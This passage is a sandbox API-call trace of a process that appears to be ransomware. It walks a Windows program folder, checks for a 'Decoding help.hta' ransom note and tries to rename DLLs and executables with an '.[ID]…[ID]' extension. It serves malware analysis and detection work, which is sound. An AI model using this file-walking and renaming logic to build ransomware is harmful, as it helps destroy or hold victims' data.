| out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR" [0053.823] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\*.*" [0053.823] GlobalMemoryStatus (in: lpBuffer=0x141dfd10 | out: lpBuffer=0x141dfd10) [0053.823] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10850388, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x484 [0053.824] CloseHandle (hObject=0x484) returned 1 [0053.824] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0053.824] lstrcmpW (lpString1=".", lpString2="pt-PT") returned -1 [0053.824] lstrcmpW (lpString1="..", lpString2="pt-PT") returned -1 [0053.824] lstrcmpiW (lpString1="windows", lpString2="pt-PT") returned 1 [0053.827] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.828] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.828] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="pt-PT" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT" [0053.828] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\*.*" [0053.828] GlobalMemoryStatus (in: lpBuffer=0x141dfd10 | out: lpBuffer=0x141dfd10) [0053.828] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a740278, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x484 [0053.830] CloseHandle (hObject=0x484) returned 1 [0053.830] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ro-RO", cAlternateFileName="")) returned 1 [0053.830] lstrcmpW (lpString1=".", lpString2="ro-RO") returned -1 [0053.830] lstrcmpW (lpString1="..", lpString2="ro-RO") returned -1 [0053.830] lstrcmpiW (lpString1="windows", lpString2="ro-RO") returned 1 [0053.833] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.833] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.833] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="ro-RO" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO" [0053.833] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\*.*" [0053.833] GlobalMemoryStatus (in: lpBuffer=0x141dfd10 | out: lpBuffer=0x141dfd10) [0053.833] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a7582e0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x484 [0053.833] CloseHandle (hObject=0x484) returned 1 [0053.834] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42a795bf, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x42a795bf, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x43f1e320, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x29800, dwReserved0=0x0, dwReserved1=0x0, cFileName="rtscom.dll", cAlternateFileName="")) returned 1 [0053.834] lstrcpyW (in: lpString1=0x2a770348, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.834] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.834] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0053.834] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0053.834] lstrcmpiW (lpString1="Decoding help.hta", lpString2="rtscom.dll") returned -1 [0053.834] lstrlenW (lpString="rtscom.dll") returned 10 [0053.834] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.834] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.834] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="rtscom.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\rtscom.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\rtscom.dll" [0053.834] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\rtscom.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\rtscom.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\rtscom.dll" [0053.834] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\rtscom.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\rtscom.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\rtscom.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0053.834] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\rtscom.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\rtscom.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\rtscom.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\rtscom.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.834] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0053.835] lstrcmpW (lpString1=".", lpString2="ru-RU") returned -1 [0053.835] lstrcmpW (lpString1="..", lpString2="ru-RU") returned -1 [0053.835] lstrcmpiW (lpString1="windows", lpString2="ru-RU") returned 1 [0053.837] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.837] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.837] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="ru-RU" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU" [0053.837] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\*.*" [0053.837] GlobalMemoryStatus (in: lpBuffer=0x141dfd10 | out: lpBuffer=0x141dfd10) [0053.837] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a770348, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x484 [0053.838] CloseHandle (hObject=0x484) returned 1 [0053.838] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a593198, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x6a593198, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xf44c0670, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0xa9c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ShapeCollector.exe", cAlternateFileName="")) returned 1 [0053.838] lstrcpyW (in: lpString1=0x2a7883b0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.839] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.839] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0053.839] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0053.839] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ShapeCollector.exe") returned -1 [0053.839] lstrlenW (lpString="ShapeCollector.exe") returned 18 [0053.839] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.839] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.839] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="ShapeCollector.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ShapeCollector.exe") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ShapeCollector.exe" [0053.839] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ShapeCollector.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ShapeCollector.exe") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ShapeCollector.exe" [0053.839] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ShapeCollector.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ShapeCollector.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ShapeCollector.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0053.839] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ShapeCollector.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\shapecollector.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ShapeCollector.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\shapecollector.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0055.674] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sk-SK", cAlternateFileName="")) returned 1 [0055.674] lstrcmpW (lpString1=".", lpString2="sk-SK") returned -1 [0055.674] lstrcmpW (lpString1="..", lpString2="sk-SK") returned -1 [0055.674] lstrcmpiW (lpString1="windows", lpString2="sk-SK") returned 1 [0055.740] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0055.740] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0055.740] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="sk-SK" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK" [0055.740] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\*.*" [0055.740] GlobalMemoryStatus (in: lpBuffer=0x141dfd10 | out: lpBuffer=0x141dfd10) [0055.740] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a8b8800, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x354 [0055.741] CloseHandle (hObject=0x354) returned 1 [0055.741] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl-SI", cAlternateFileName="")) returned 1 [0055.741] lstrcmpW (lpString1=".", lpString2="sl-SI") returned -1 [0055.741] lstrcmpW (lpString1="..", lpString2="sl-SI") returned -1 [0055.741] lstrcmpiW (lpString1="windows", lpString2="sl-SI") returned 1 [0055.743] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0055.743] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0055.744] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="sl-SI" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI" [0055.744] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\*.*" [0055.744] GlobalMemoryStatus (in: lpBuffer=0x141dfd10 | out: lpBuffer=0x141dfd10) [0055.744] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a8d0868, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x354 [0055.744] CloseHandle (hObject=0x354) returned 1 [0055.744] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr-Latn-CS", cAlternateFileName="SR-LAT~1")) returned 1 [0055.744] lstrcmpW (lpString1=".", lpString2="sr-Latn-CS") returned -1 [0055.745] lstrcmpW (lpString1="..", lpString2="sr-Latn-CS") returned -1 [0055.745] lstrcmpiW (lpString1="windows", lpString2="sr-Latn-CS") returned 1 [0055.747] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0055.747] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0055.747] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="sr-Latn-CS" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS" [0055.747] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\*.*" [0055.747] GlobalMemoryStatus (in: lpBuffer=0x141dfd10 | out: lpBuffer=0x141dfd10) [0055.747] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a8e88d0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x354 [0055.748] CloseHandle (hObject=0x354) returned 1 [0055.748] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0055.748] lstrcmpW (lpString1=".", lpString2="sv-SE") returned -1 [0055.748] lstrcmpW (lpString1="..", lpString2="sv-SE") returned -1 [0055.748] lstrcmpiW (lpString1="windows", lpString2="sv-SE") returned 1 [0055.751] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0055.751] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0055.751] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="sv-SE" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE" [0055.751] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\*.*" [0055.751] GlobalMemoryStatus (in: lpBuffer=0x141dfd10 | out: lpBuffer=0x141dfd10) [0055.751] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a900938, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x354 [0055.752] CloseHandle (hObject=0x354) returned 1 [0055.752] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56ef1310, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x56ef1310, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x449d3e50, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x9e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="TabIpsps.dll", cAlternateFileName="")) returned 1 [0055.752] lstrcpyW (in: lpString1=0x2a9189a0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0055.752] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0055.752] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0055.752] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0055.752] lstrcmpiW (lpString1="Decoding help.hta", lpString2="TabIpsps.dll") returned -1 [0055.752] lstrlenW (lpString="TabIpsps.dll") returned 12 [0055.752] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0055.753] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0055.753] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="TabIpsps.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll" [0055.753] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll" [0055.753] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0055.753] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabipsps.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\TabIpsps.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tabipsps.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0057.104] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bf05363, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8bf05363, 